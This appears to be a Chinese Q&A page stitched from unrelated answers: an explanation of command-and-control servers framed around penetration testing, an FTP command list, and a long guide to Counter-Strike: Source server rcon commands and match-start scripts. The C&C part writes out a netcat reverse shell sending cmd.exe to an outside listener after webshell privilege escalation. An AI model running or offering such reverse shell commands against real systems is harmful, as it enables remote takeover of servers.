什么是C&C服务器

C&C

服务器的全称是

Command

and

Control

Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个

webshell

的时候，需要对服务器进行提权操作，如果是一台

windows

的服务器，提权的时候通常是利用本地提权漏洞的

exp

进行溢出提权，有些

exp

可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的

exp

溢出成功之后是返回一个

system

权限的

cmd，这时就需要将低权限的

cmd

shell

反弹回本地，这里用

nc

在本地执行：nc

-vv

-lp

3333

上述命令的意思是在本地监听一个

3333

端口等待连接，假设电脑

IP

是公网的，并且

IP

为

114.114.114.114，然后在目标服务器就可以执行：nc

114.114.114.114

3333

-e

cmd.exe

上面的命令就可以把远程服务器的服务器权限的

cmd

shell

返回到本地，这时你就可以通过

nc

建立的这个

shell

进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的

C&C

服务器。

扩展资料：

C&C

服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网

IP

地址是：111.111.111.111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网

IP

的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

熟悉并灵活应用FTP的内部命令，可以收到事半功倍的效果。FTP的命令行格式为:ftp-v-d-i-n-g[主机名]。其中:-v显示远程服务器的所有响应信息；-n限制ftp的自动登录，即不使用；.netrc文件；-d使用调试方式；-g取消全局文件名。FTP使用的常见内部命令包括:account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。bye:退出ftp会话过程。cdremote-dir:进入远程主机目录。cdup:进入远程主机目录的父目录。close:中断与远程服务器的ftp会话(与open对应)。cr:使用asscii方式传输文件时，将回车换行转换为回行。eleteremote-file:删除远程主机文件。dir[remote-dir][local-file]:显示远程主机目录，并将结果存入本地文件local-file中。getremote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file中。help[cmd]:显示ftp内部命令cmd的帮助信息，如:helpget。ls[remote-dir][local-file]:显示远程目录remote-dir，并存入本地文件local-file中。mdelete[remote-file]:删除远程主机文件。mgetremote-files:传输多个远程文件。mkdirdir-name:在远程主机中建一目录。newerfile-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。pwd:显示远程主机的当前工作目录。rmdirdir-name:删除远程主机目录。sizefile-name:显示远程主机文件大小，如:siteidle7200。status:显示当前ftp状态。system:显示远程主机的操作系统类型。另外输入“help”命令还能及时得到帮助信息，如果输入?[cmd]就能得到关于[cmd]命令的相关帮助。

一楼是抄来的吧？那么全，可惜大部分是本机命令而不是服务器控制命令，而且有很多是1.6的命令而不是CS:Source特有命令。

一、首先你要成为OP，必须先知道远程管理密码。

你作为玩家进入服务器后，首先输入：

rcon_password "********"

如果密码正确，则取得服务器管理员权限，可以进行后面的操作。注意这条命令的rcon之后是一条下划线，与下面的各条不同。

二、常用的服务器命令如下：

mp_restartgame 1

刷新，服务器将在一秒后刷新一次，后面的数字可以改为别的，例如改为3，则在3秒后刷新一次。

（注意，这些命令在服务器主机上操作或用HLSW操作时可以直接使用，如果你作为玩家进入服务器玩的时候要远程操作，则所有命令前需要加 rcon 然后是一个空格，例如： rcon mp_restartgame 1 ，后面所有命令都是如此）

sv_password "****"

进入服务器的密码，注意引号是半角的（也就是在英文输入法状态下的引号，不能用中文输入法下的全角引号。

sv_password " "

取消服务器密码，引号之间是一空格，则服务器将不需要密码即可进入。

特别一提，如果你是要把这条命令写进服务器配置文件放在服务器上（例如你要做一个没有密码的混战服务器），则在前后引号之间不要打空格，两引号直接相连即可）。

mp_friendlyfire 0

数字是0为关闭队友伤害，是1则是开启队友伤害。

mp_autoteambalance 0

数字0为关闭自动平衡双方队伍人数，建议比赛时用，1则是开启自动平衡，建议混战时使用。

mp_startmoney 800

mp_startmoney 1500

mp_startmoney 16000

设置游戏开始的金钱数。

mp_roundtime 1.75

每局时间，单位为分钟，1.75分钟即1分45秒。

mp_freezetime 15

每局开局的冻结（玩家不能动）的时间，单位为秒。

mp_buytime 0.25

冻结时间后玩家可以回基地买枪的时间，单位为分钟。

mp_c4timer 35

C4爆炸时间，单位为秒。

sv_alltalk 1

所有人之间语音通话 开启1/关闭0，比赛时应关闭alltalk。

mp_tkpunish 0

队友伤害惩罚 开启1/关闭0，建议比赛时关闭。

mp_autokick 0

自动踢出不动的玩家 开启1/关闭0，建议比赛时关闭。

mp_spawnprotectiontime 0

控制在每局开始后不能进行队友伤害的时间，在这个时间之内伤害队友将被踢除，单位为秒，设置为0则关闭该功能。

sv_voiceenable 1

麦克风语音通讯 开启1/关闭0

mp_allowspectators 1

观察员模式 开启1/关闭0，建议混战和友谊赛设置为1，重要比赛不让旁观时设置为0。

mp_limitteams 1

队伍间人数差异上限 ( 0 = 不限制 )

mp_forcecamera 0

死亡后视角 只有本队队友1/死亡玩家视角停在死亡时的原地2/无限制0，混战建议用0，比赛建议用1，有些人以为比赛用2好，其实比赛时用2反而可能使死亡玩家看到不应该看到的东西而报点。

mp_fadetoblack 0

1=死后黑屏，0=不变。

changelevel de_dust2

changelevel de_nuke

changelevel de_inferno

changelevel de_train

changelevel cs_office

……

换地图（玩家仍然会留在服务器里）

map de_dust2

map cs_italy

……

换地图并重新读取配置服务器（服务器开久了卡的话，可以用这个命令重读服务器，这样就象刚开一样不卡，但是这个命令会让所有玩家掉出去，因此在使用前最好通知大家过一两分种再进，否则有可能玩家因为以为服务器挂了而离开。）

三、服务器本身没有r3(lo3)命令，你可以写一个脚本，让服务器系统管理员放在服务器上的cfg文件夹里。下面是我写的脚本，你可以复制下来（把里面我写的个性化信息换成你自己的）存在记事本里，然后把记事本扩展名改为.cfg，例如可以叫 lo3.cfg

***********************

//

*|[ lo3.cfg ]|*

// Aliases

alias w "wait"

alias w5 "wwwww"

alias w10 "w5w5"

alias w20 "w10w10"

alias w50 "w10w10w10w10w10"

alias w80 "w50w20w10"

alias w100 "w50w50"

alias w150 "w100w50"

alias w300 "w100w100w100"

alias w500 "w100w100w100w100w100"

alias l1a "say 1ST RESTARTS!!!mp_restartgame 1w500w500w10"

alias l2a "say 2ST RESTARTS!!!mp_restartgame 2w500w500w300w150"

alias l3a "say 3ST RESTARTS!!!mp_restartgame 3w500w500w500w300"

alias l4 "say [------------]w10lo5"

alias lo5 "say [E-----------]w10lo6"

alias lo6 "say [VE----------]w10lo7"

alias lo7 "say [IVE---------]w10lo8"

alias lo8 "say [LIVE--------]w10lo9"

alias lo9 "say [-LIVE-------]w10lo10"

alias lo10 "say [--LIVE------]w10lo11"

alias lo11 "say [---LIVE-----]w10lo12"

alias lo12 "say [----LIVE----]w10lo13"

alias lo13 "say [-----LIVE---]w10lo14"

alias lo14 "say [------LIVE--]w10lo15"

alias lo15 "say [-------LIVE-]w10lo16"

alias lo16 "say [--------LIVE]w10lo17"

alias lo17 "say [E--------LIV]w10lo18"

alias lo18 "say [VE--------LI]w10lo19"

alias lo19 "say [IVE--------L]w10lo20"

alias lo20 "say [LIVE--------]w10lo21"

alias lo21 "say [-LIVE-------]w20lo22"

alias lo22 "say [--LIVE------]w20w10lo23"

alias lo23 "say [---LIVE-----]w20w20lo24"

alias lo24 "say [----LIVE----]w50lo25"

alias lo25 "say [----LIVE----]w50w20lo26"

alias lo26 "say [----LIVE----]w100lo27"

alias lo27 "say [----LIVE----]w100"

alias sx3 "say [-------LIVE ON THREE RESTARTS!!!-------]w50"

alias wel "say [-------Welcome to GA Server!!!-------] !w50"

alias stb "say [-------Match is now LIVE!!!!-------]w50"

alias snf "say Long lIVE GA.SNF !w50"

alias hyd "say Long lIVE GA.HYD !w50"

alias gl1 "say Good Luck !w50"

alias hf1 "say Have Fun !!"

// Execute

wel

wel

w100

snf

snf

w100

hyd

hyd

w100

sx3

sx3

w100

l1a

l2a

l3a

l4

w100

stb

stb

w100

gl1

hf1

// GL HF

********************

lo3.cfg文件放到服务器上后，你可以用命令

rcon exec lo3.cfg

来实现自动r3

如果你没有办法把这个脚本放到服务器上，例如你和系统管理员不熟悉，或者是借用别人的服务器，那么你可以按以下操作：

首先把下面这段内容做成一个.cfg文件，例如叫bjr3.cfg，放进你的游戏文件目录的cstrike文件夹下的cfg文件夹里。

*******************

//

rcon say "[-比赛将在刷新三次后开始!!!-------]"

rcon ww100

rcon say "[---比赛将在刷新三次后开始!!!-----]"

rcon ww100

rcon say "[-----比赛将在刷新三次后开始!!!---]"

rcon ww100

rcon say "[-------比赛将在刷新三次后开始!!!-]"

rcon ww100

rcon say "[-----比赛将在刷新三次后开始!!!---]"

rcon ww100

rcon say "[---比赛将在刷新三次后开始!!!-----]"

rcon ww100

rcon say "[-比赛将在刷新三次后开始!!!-------]"

rcon ww100

rcon say "第一次刷新"

rcon mp_restartgame 1

rcon ww600

rcon say "第二次刷新"

rcon mp_restartgame 2

rcon ww600

rcon ww600

rcon say "第三次刷新"

rcon mp_restartgame 3

rcon ww600

rcon ww600

rcon ww100

rcon say "[-比赛已经开始!!!-------]"

rcon ww100

rcon say "[---比赛已经开始!!!-----]"

rcon ww100

rcon say "[-----比赛已经开始!!!---]"

rcon ww100

rcon say "[-------比赛已经开始!!!-]"

rcon ww100

rcon say "[-----比赛已经开始!!!---]"

rcon ww100

rcon say "[---比赛已经开始!!!-----]"

rcon ww100

rcon say "[-比赛已经开始!!!-------]"

rcon ww100

rcon say "[------Good Luck !------]"

rcon say "[------Have Fun !!------]"

rcon sv_allow_wait_command 0

**********************

然后，在比赛开始前，你必须用HLSW，按顺序向服务器发送这样4条命令：

sv_allow_wait_command 1

alias "ww10" "waitwaitwaitwaitwaitwaitwaitwaitwaitwait"

alias "ww100" "ww10ww10ww10ww10ww10ww10ww10ww10ww10ww10"

alias "ww500" "ww100ww100ww100ww100ww100ww100"

发送这4条命令后，切回游戏界面，在控制台输入：

exec bjr3

然后回车。

注意，这条命令前没有"rcon "

悬赏的分太少，如果追加到200分，我愿意提供有关CSS脚本和服务器管理的高级技巧，例如如何建一个稳定流畅的高配置服务器、如何写服务器配置脚本、如何优化CS:Source、如何自己编写脚本、还可以帮你做一个超级傻瓜化服务器管理脚本（你完全不用记任何服务器管理命令就可以方便管理服务器，只需要在控制台打r1(也就是打两个字符）就刷新，打r3就开战，打bs就自动生成全部比赛参数配置，打hz就自动进入混战模式，打d2就自动换到dust2，打8就自动把钱改为800开局，打16就是16000开局，等等……

如果有兴趣就加我QQ：406111

---